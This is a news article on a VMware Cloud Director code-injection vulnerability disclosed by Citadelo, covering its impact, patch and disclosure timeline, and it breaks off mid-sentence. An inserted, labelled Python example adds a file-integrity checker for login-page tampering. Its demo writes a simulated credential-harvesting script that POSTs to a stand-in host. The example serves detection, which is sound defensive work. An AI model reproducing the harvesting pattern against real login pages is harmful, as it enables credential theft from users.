VMware Bounces Back from Cloud Director Vulnerability
A newly discovered vulnerability in VMware Cloud Director allows attackers who have compromised one account to spread to all the other accounts in a data center.
Previously marketed as vCloud Director (and before that as vCloud Hybrid Service), VMware Cloud Director is a cloud service-delivery platform widely used to deploy and manage virtual data centers and manage virtual cloud resources.
“VMware is aware of the vulnerability,” Stefanie Cannon, a VMware spokesperson, told Data Center Knowledge.
VMware issued a security advisory to its customers in late May, she explained, but declined to comment further. “This is our public statement on the issue,” she said.
This article by Maria Korolov originally appeared on Channel Futures’ sister site, Data Center Knowledge.
The good news is that VMware has released an upgrade that fixes the problem, and has published a set of workarounds for deployments where the Cloud Director software can’t be upgraded yet. Also on the positive side, only a couple of thousand vulnerable Cloud Director servers are exposed to the public internet, according to Tomas Zatko, CEO of Slovak Republic-based Citadelo, the company that discovered the vulnerability.
The bad news is that a Cloud Director server doesn’t have to be exposed to the internet to be attacked, since the attacker only needs a valid login to start from, and there will probably be companies that don’t patch fast enough to fix the problem before attackers find them.
Zatko told Data Center Knowledge that his company reached out to as many companies as they could to tell them about the problem.
“We feel responsible to warn as many people as possible,” he said.
How It Works
Here’s how the attack works. A malicious hacker uses compromised credentials to log into a VMware Cloud Director management console. They then use code injection to break out of the application into the underlying infrastructure.
“Then they can do anything,” said Zatko. “They can delete other databases or other virtual machines, copy data, modify data. It’s possible for them to do it in a very loud way, so it’s easy to find them out, or they can do it in a stealthy way. Without a proper security monitoring system and incident response processes, it could be unnoted for a very long time.”
Attackers can also see password hashes for other customers on the system and give themselves system administrator privileges. Then they can change the login page for the Cloud Director in order to capture other login credentials, and gather customer information such as names and email addresses.
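One of the post-exploitation steps described above, tampering with the login page to harvest other tenants’ credentials, is exactly the kind of change that goes unnoticed without the monitoring Zatko mentions. The following is an added example, not code from the article, from Citadelo or from VMware: a minimal file-integrity baseline for a web asset directory that reports modified, added and removed files. The directory layout, file names and the `harvest.js` tampering scenario are constructed for the demonstration; the real Cloud Director web root is not stated on the page and is not assumed here.

```python
import hashlib
import tempfile
from pathlib import Path


def file_sha256(path: Path) -> str:
    """SHA-256 of a file's contents, read in chunks so large assets are fine."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> dict[str, str]:
    """Map every regular file under root (relative POSIX path) to its SHA-256."""
    baseline = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            baseline[path.relative_to(root).as_posix()] = file_sha256(path)
    return baseline


def check_against_baseline(baseline: dict[str, str], root: Path) -> dict[str, list[str]]:
    """Compare the current tree with the stored baseline; any difference is a finding."""
    current = build_baseline(root)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def demo() -> dict[str, list[str]]:
    """Constructed scenario: baseline a fake login-page directory, then tamper with it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "login").mkdir()
        (root / "login" / "index.html").write_text("<form action='/login'>...</form>\n")
        (root / "login" / "app.js").write_text("function submitLogin(){}\n")
        (root / "login" / "style.css").write_text("body{}\n")

        baseline = build_baseline(root)  # in practice, store this off-host and read-only

        # Simulated tampering (constructed, hypothetical file names): a credential-harvesting
        # script tag is appended to the login page, the script itself is dropped next to it,
        # and a stylesheet is deleted.
        with (root / "login" / "index.html").open("a") as f:
            f.write("<script src='/login/harvest.js'></script>\n")
        (root / "login" / "harvest.js").write_text("fetch('https://example.invalid', {method:'POST'})\n")
        (root / "login" / "style.css").unlink()

        return check_against_baseline(baseline, root)


if __name__ == "__main__":
    for kind, paths in demo().items():
        for p in paths:
            print(f"{kind}: {p}")
```

The baseline must be taken from a known-good state (a freshly patched install) and kept somewhere an attacker with control of the host cannot rewrite it, otherwise the check only confirms whatever the attacker left behind. Running the comparison on a schedule and forwarding any non-empty result to the SIEM turns the login-page modification into an alert rather than something discovered months later.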
VMware rates this as an “important” vulnerability on its own severity scale, with a CVSSv3 base score of up to 8.8 on a 10-point scale (7.0 to 8.9 is the CVSS “High” band).
Citadelo discovered the vulnerability in April, Zatko said, and reported it to VMware on April 1. VMware confirmed within a couple of days that it was a real problem.
“Since it was the first of April, they probably thought we were joking, but we were not,” Zatko said.
Citadelo posted the results of its research on June 1, after VMware released the fix and notified its customers.
According to Zatko, vulnerabilities such as this can bring in hundreds of thousands of dollars on the black market if they are discovered by malicious actors and sold before anyone else knows about them. But he hasn’t seen any evidence that this vulnerability has been used in the wild.
Free Trial Offers Risky
Zatko warned that data centers offering hosting to third parties are particularly vulnerable to …